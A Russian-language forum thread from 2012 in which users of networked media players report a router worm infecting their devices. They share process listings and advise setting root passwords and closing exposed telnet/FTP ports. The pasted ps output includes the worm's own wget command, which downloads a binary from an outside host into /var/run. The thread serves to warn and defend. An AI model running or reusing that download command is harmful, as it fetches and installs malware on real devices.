Page 1 of 2

ОСТОРОЖНО: Сетевой троян!

PostPosted: 07 Mar 2012, 23:49
by FarVoice
Добрый (ну или не очень) вечер всем!
Сегодня я наблюдал очень интересную картинку на плеере, выставленном в инет:
| +
top
last pid: 20087; load avg: 0.80, 0.94, 0.61; up 0+01:41:04 19:58:29
214 processes: 3 running, 210 sleeping, 1 zombie
CPU states: 4.7% user, 0.0% nice, 21.5% system, 73.8% idle, 0.0% iowait
Memory: 111M used, 7268K free, 92K buffers, 5712K cached
Swap: 32K free

PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
2447 root 22 0 3400K 1668K sleep 0:32 4.97% 6.34% mipsel
2439 root 15 0 3400K 1668K sleep 0:13 2.05% 3.62% mipsel
19959 root 16 0 1768K 468K run 0:00 17.08% 3.62% top
19999 root 18 0 3400K 1668K sleep 0:00 0.03% 1.81% mipsel
244 root -2 0 802M 4564K sleep 0:00 0.02% 0.91% RPC_thread_V
20077 root 23 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20087 root 23 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20065 root 22 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20039 root 19 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
20014 root 18 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
19974 root 17 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
19977 root 17 0 3400K 1668K sleep 0:00 0.02% 0.91% mipsel
161 root 15 0 802M 4564K sleep 1:07 1.11% 0.00% MAIN
17 root 15 0 0K 0K sleep 0:39 0.65% 0.00% eth0
238 root 26 10 21M 2604K sleep 0:24 0.39% 0.00% php

Посмотрев процессы, я обнаружил там
| +
16211 root        272 S   wget -c http://cosini.uk.to/ppc -P /var/run
16584 root 1452 S /var/run/mipsel
16585 root 1452 S /var/run/mipsel
16586 root 1452 S /var/run/mipsel
16587 root 1452 S /var/run/mipsel
16588 root 1452 S /var/run/mipsel
16589 root 1452 S /var/run/mipsel
16590 root 1292 S /var/run/mipsel
16591 root 1292 S /var/run/mipsel
16592 root 1292 S /var/run/mipsel
16593 root 1292 S /var/run/mipsel
16594 root 1292 S /var/run/mipsel
16595 root 1292 S /var/run/mipsel

Глянул на место, откуда запускалось:
| +
~ # ls /tmp/run -l
-rwxr-xr-x 1 root root 202192 Mar 4 12:52 arm
-rwxr-xr-x 1 root root 262109 Mar 4 12:52 mips
-rwxr-xr-x 1 root root 266266 Mar 4 12:52 mipsel
-rwxr-xr-x 1 root root 194823 Mar 4 12:52 ppc
-rwxr-xr-x 1 root root 179576 Mar 4 12:52 sh


Итак, перед нами роутерный червь для линуксовых прошивок, который умеет запускаться на вышеперечисленных процессорах. Увы, но наш плеер в их числе.
Пока этот червь не делает никаких деструктивных действий, потому что просто не знает (пока) данную конфигурацию. Единственный вред - нагружает процессор и сеть. Но это только до той поры, пока хозяин червя не знает, что появилась новая ниша для распространения.

Бороться с червём достаточно просто:
не выставляйте незапароленные плеера в интернет!
Если всё-таки это нужен внешний доступ к плееру - установите модуль parole и задайте рутовый пароль! Особенно это относится к плеерам, подключенным напрямую к провайдеру и, возможно, через ppp соединение.

Если вы всё-таки поймали трояна (симптомы - тормоза, зависания, mipsel в процессах) - просто перегрузите плеер.

Не распространяйте заразу - предохраняйтесь!

Re: ОСТОРОЖНО: Сетевой троян!

PostPosted: 08 Mar 2012, 08:02
by Virtual
модуль в moS зовется
Authorization
установит пароль как на вэб морду так и на телнет/фтп.
1. просто установить модуль
2. в вэб: Дополнительно - авторизация, задать пароль.

ЗЫ
.пароли: root admin 111 123. лучше не ставить 8-) . не поможет.
. так же рекомендую не пробрасывать службы плеера наружу по своим оригинальным портам: 20 21 23 80, и по портам: 8880 8080.

ЗЫЗЫ само собой тем кто не пользует PPP или не пробрасывает доступ к плееру из-за роутера, беспокоится практически не о чем ;)

Re: ОСТОРОЖНО: Сетевой троян!

PostPosted: 08 Mar 2012, 17:08
by шлепачка
ну вот подскажите мне плись нужна ли мне ставить авторизацию если
у меня инет приходит на роутер на каторам вкл фаервол
и уже роутер раздает инет АСУСУ и двум компам

Re: ОСТОРОЖНО: Сетевой троян!

PostPosted: 08 Mar 2012, 17:16
by FarVoice
нет, не надо.

Re: ОСТОРОЖНО: Сетевой троян!

PostPosted: 10 Mar 2012, 11:49
by ordin
Возможно, что троян "заточен" под андроид системы? Что посоветуете владельцам
плееров на андроиде, да и не только плееров?

Re: ОСТОРОЖНО: Сетевой троян!

PostPosted: 10 Mar 2012, 12:20
by FarVoice
ordin wrote:Возможно, что троян "заточен" под андроид системы? Что посоветуете владельцам
плееров на андроиде, да и не только плееров?

то же самое - не выставляйте незапароленный плеер наружу 23 портом!

Re: ОСТОРОЖНО: Сетевой троян!

PostPosted: 10 Mar 2012, 12:47
by Sekator500
Можно использовать iptables в качестве фаервола, но надо ядро пересобрать с netfilter и модулем ip_tables

Re: ОСТОРОЖНО: Сетевой троян!

PostPosted: 10 Mar 2012, 13:08
by Virtual
Sekator500 wrote:Можно использовать iptables в качестве фаервола, но надо ядро пересобрать с netfilter и модулем ip_tables

да, но если не используется PPP соединения то абсолютно не нужно :). пароля на телнет и фтп заглаза...Linux системы очень устойчивы к доступу извне.

ЗЫ данный троян заточен под РОУТЕРЫ, на плееры он попадает по "счастливому стечению обстоятельств" :)
да и вообще червяк писан "пионерами", и расчитывает что ленивый юзер не менял дефолтных паролей на роутере иль оставил вообще без пароля.

ЗЫЗЫ если у вас в плеере нет средств установить пароль на root (ответ на это:)
ordin wrote:Возможно, что троян "заточен" под андроид системы? Что посоветуете владельцам
плееров на андроиде, да и не только плееров?

то просто не выставляйте плеер наружу за роутер, и не пользуйтесь PPP

Re: ОСТОРОЖНО: Сетевой троян!

PostPosted: 11 Mar 2012, 16:35
by Dark_Diver
О, он ещё жив ;)
Этому червю уже года четыре, если мне не изменяет память. О нём предупреждали и настоятельно просили менять дефолтные пароли на роутерах. Вроде, он линухово-мипсовые DSL-роутеры заражал, пользуясь дефолтными паролями или подбором по словарю.
Спасибо за предупреждение, буду знать, что наши плееры тоже уязвимы.

Re: ОСТОРОЖНО: Сетевой троян!

PostPosted: 16 Apr 2012, 15:17
by asuser
Добрый день!
Установил пароль, а при входе в web-интерфейс запрашивает еще и имя пользователя. Может быть оно какое-то по умолчанию? Подскажите, пожалeйста, как быть?